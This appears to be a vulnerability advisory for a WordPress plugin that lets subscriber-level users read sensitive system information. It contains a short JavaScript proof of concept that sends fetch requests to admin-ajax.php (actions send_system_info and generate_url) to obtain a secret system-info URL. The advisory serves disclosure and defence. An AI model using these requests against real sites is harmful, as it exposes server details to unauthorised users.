The plugin does not prevent users with low privileges (like subscribers) from accessing sensitive system information.
fetch('http://wpscan.local/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=send_system_info', redirect: 'follow' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); fetch('https://wpscan.local/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=generate_url', redirect: 'follow' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); Then we get the secret url for system info
Lana Codes
Lana Codes
Yes
2022-11-28 (about 6 months ago)
2022-11-28 (about 6 months ago)
2022-11-28 (about 6 months ago)